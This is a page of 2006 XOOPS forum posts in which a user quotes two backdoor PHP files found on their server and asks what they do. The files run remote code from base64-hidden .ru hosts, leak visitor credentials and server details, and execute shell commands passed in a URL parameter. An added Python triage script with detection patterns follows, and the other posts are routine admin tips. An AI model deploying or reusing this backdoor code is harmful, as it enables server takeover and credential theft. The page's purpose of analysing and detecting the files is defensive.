xoops forums


Board index » All Posts (OldFriend)




OldFriend

Just popping in
Posted on: 2006/8/25 8:05
Posts: 99
Since: 2005/10/28
#21

System Security.

I found the following php files uploaded to a directory on my site. They aren't part of XOOPS so I can only assume that a hacker has put them there.

Can anybody tell me what these files would have allowed the culprit to do?

The first one was called guest.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=" . base64_encode($_POST["l"]) ."&p=" . base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=" . $_POST["l"] ."&p=" . $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


The second was called messages.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
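
Added example, not part of the original post: a Python triage sketch for the question above. It flags the traits the two quoted files share (silenced errors, include() of a base64-hidden URL, request parameters passed to a shell function) and decodes the hidden URLs. The sample input and its hosts are constructed placeholders, and the function names are this example's own.

```python
import base64
import re

# Traits shared by the two dropped files quoted in the post above.
INDICATORS = {
    "errors_silenced": re.compile(r"\berror_reporting\s*\(\s*0\s*\)", re.I),
    "remote_include": re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*base64_decode", re.I),
    "request_to_shell": re.compile(r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)", re.I),
    "backtick_exec": re.compile(r"`[^`\n]+`"),  # noisy: also matches SQL identifier quoting
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")

def decode_literals(php_source):
    """Decode every base64_decode("...") string literal, in source order."""
    decoded = []
    for match in B64_LITERAL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error: not valid base64, skip it
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded

def remote_targets(decoded):
    """Rejoin a bare scheme ("http://") with the literal after it; keep URLs only."""
    targets, i = [], 0
    while i < len(decoded):
        item = decoded[i]
        if item.endswith("://") and i + 1 < len(decoded):
            i += 1
            item += decoded[i]
        if "://" in item:
            targets.append(item)
        i += 1
    return targets

def triage(php_source):
    """Return matched indicator names and the URLs hidden in base64 literals."""
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(php_source))
    return {"indicators": hits, "targets": remote_targets(decode_literals(php_source))}

def _enc(s): return base64.b64encode(s.encode()).decode()
# Constructed sample (not the files from the post); hosts are placeholders.
SAMPLE = (
    '<?php error_reporting(0);\n'
    'if(!@include_once(base64_decode("%s").$q)){system($_GET["k"]);}\n'
    'include(base64_decode("%s").base64_decode("%s")."/?".$s); ?>'
) % tuple(map(_enc, ("http://c2.example.invalid/m.php?r=", "http://", "h.example.invalid")))
```

Run triage() over the contents of each .php file in writable directories such as uploads, cache and templates_c; any file reporting remote_include or request_to_shell should be quarantined and compared against a clean copy of the release.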


OldFriend

Just popping in
Posted on: 2006/8/6 16:59
#22

Re: Hacker Tracker?

Add NetQuery module as well as Protector.

Protector will tell you the IP address.
NetQuery will track the IP address.


OldFriend

Just popping in
Posted on: 2006/8/6 16:47
#23

Re: What is your best module/method for backing up?

I find that the Protector module (everybody has this installed, right?) is good for backing up the database before making any major changes.

Admin->Modules->Protector->Prefix Manager

allows you to create a copy of all of your tables with a different Prefix.

Then make your changes; if you stuff something up, you can easily switch to using your DB copies.


OldFriend

Just popping in
Posted on: 2006/8/1 16:22
#24

Re: Gdrive???

GDrive is the name of a service speculated to be offered by Google. The service is believed to be some form of unlimited online storage space (a concept similar to its current Gmail service which offers 2 gigabytes of scaled email storage space).

Discussion of the service began on March 3, 2006 when bloggers discovered a slide presentation on the Google website in which Google executives stated: "With infinite storage, we can house all user files, including emails, web history, pictures, bookmarks, etc and make it accessible from anywhere (any device, any platform, etc)". The presentation has since been taken down and been replaced by a 94-page Adobe Acrobat file, devoid of the speaker notes. Google has refused to confirm or deny the GDrive program claiming that the presentation was not intended for the public.

The discovery has, however, prompted media speculation surrounding a forthcoming service.

Retrieved from "http://en.wikipedia.org/wiki/GDrive"


OldFriend

Just popping in
Posted on: 2006/7/27 9:05
#25

Re: System Security

Great, that looks easy enough.

Thank you.


OldFriend

Just popping in
Posted on: 2006/7/27 8:42
#26

Re: Editing .php files, cache?

The module itself may be cached. You can turn that off in the admin section.


OldFriend

Just popping in
Posted on: 2006/7/26 10:31
#27

Re: please help with this error code

Quote:
Shall I delete all the files, or just that one?


It won't hurt to delete all the .php files (and is probably good practice to do occasionally).

Quote:
What kind of files is it, temp files?


They are compiled template files.

The system will automatically re-compile a file if it is not found.


OldFriend

Just popping in
Posted on: 2006/7/26 10:14
#28

System Security

Because these folders need to be set to writable, can someone please tell me the contents of .htaccess file to add to the templates_c and the cache folders to improve the security?


OldFriend

Just popping in
Posted on: 2006/7/20 18:31
#29

Re: Migrating to Xoops

xcGallery RC 1.1
xcGallery is a gallery module for XOOPS 2.0.x based on coppermine photo gallery 1.1.0 by Gregory DEMAR.


OldFriend

Just popping in
Posted on: 2006/7/9 5:26
#30

Re: Security concerns with Unix permissions

Quote:
I'd recommend you also look at using the Protector Module. One of the things included are instructions for moving the dB username/password out of mainfile and into a secure area.


I don't understand why these 2 features are not part of a minimum install.


